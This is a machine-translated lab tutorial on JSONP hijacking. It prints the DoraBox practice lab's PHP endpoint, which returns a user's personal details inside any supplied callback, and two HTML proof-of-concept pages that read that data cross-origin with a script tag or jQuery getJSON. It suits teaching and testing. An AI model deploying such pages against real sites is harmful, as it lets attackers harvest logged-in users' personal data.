Cross-domain JSONP:
Since the script tag is not the same origin policy affecting browser, cross-domain reference resource,
You can be dynamically configured <script> tag to cross-domain request. Requested data back
We will pass a specified callback function pass back
JSONP vulnerabilities:
Drone Code
<?php include "../class/function.class.php"; $reqMethod = "GET"; $reqValue = "callback"; $p = new Func($reqMethod, $reqValue); $info = array('username' => 'Vulkey_Chen', 'mobilephone' => '13188888888', 'email' => '[email protected]', 'address' => '中华人民共和国', 'sex' => 'Cool Man'); if(!@$_GET['callback']){ echo $p -> con_function('json_encode',$info); }else{ $callback = htmlspecialchars($_GET['callback']); echo "{$callback}(" . $p -> con_function('json_encode',$info) . ")"; } ?>
Code behind, it is determined whether there is a callback parameter, if the output json format information,
If there is, do a transcoding entity, then the output json format.
Use the code:
1 <!DOCTYPE html> 2 <html lang="en"> 3 <head> 4 <meta charset="UTF-8"> 5 <title>jsonp</title> 6 7 </head> 8 <body> 9 <script type="text/javascript"> 10 function test(data) { 11 alert(data.username); 12 } 13 var body = document.getElementsByTagName('body')[0]; 14 var script = document.createElement('script'); 15 script.src = 'http://192.168.160.1/DoraBox-master/csrf/jsonp.php?callback=test'; 16 body.appendChild(script); 17 18 </script> 19 </body> 20 </html>
Generating a request by dynamically <script>
.GetJSON using jquery $ () to request
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>JSONPJQUERY</title> <script src="http://cdn.static.runoob.com/libs/jquery/1.8.3/jquery.js"></script> </head> <body> <script> $.getJSON("http://192.168.160.1/DoraBox-master/csrf/jsonp.php?callback=?",function (data) { alert(data.username) }) </script> </body> </html>
